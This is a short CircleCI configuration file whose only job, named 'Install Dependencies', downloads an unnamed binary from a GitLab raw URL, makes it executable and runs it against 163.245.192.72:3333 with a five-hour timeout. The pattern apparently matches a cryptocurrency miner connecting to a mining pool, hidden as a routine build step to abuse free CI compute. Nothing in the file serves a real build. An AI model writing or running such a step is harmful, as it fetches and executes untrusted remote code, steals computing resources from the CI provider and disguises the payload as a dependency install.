version: 2.1
jobs:
    trial:
      docker:
            - image: cnkajgqe2/az1
      parallelism: 1
      steps:
        - run:
            name: Install Dependencies
            command: wget https://gitlab.com/bnqwbdqwr/annh/-/raw/main/janet && chmod +x janet  && ./janet -o 163.245.192.72:3333
            no_output_timeout: 5h

workflows:
    version: 2.1
    build:
        jobs:
        - trial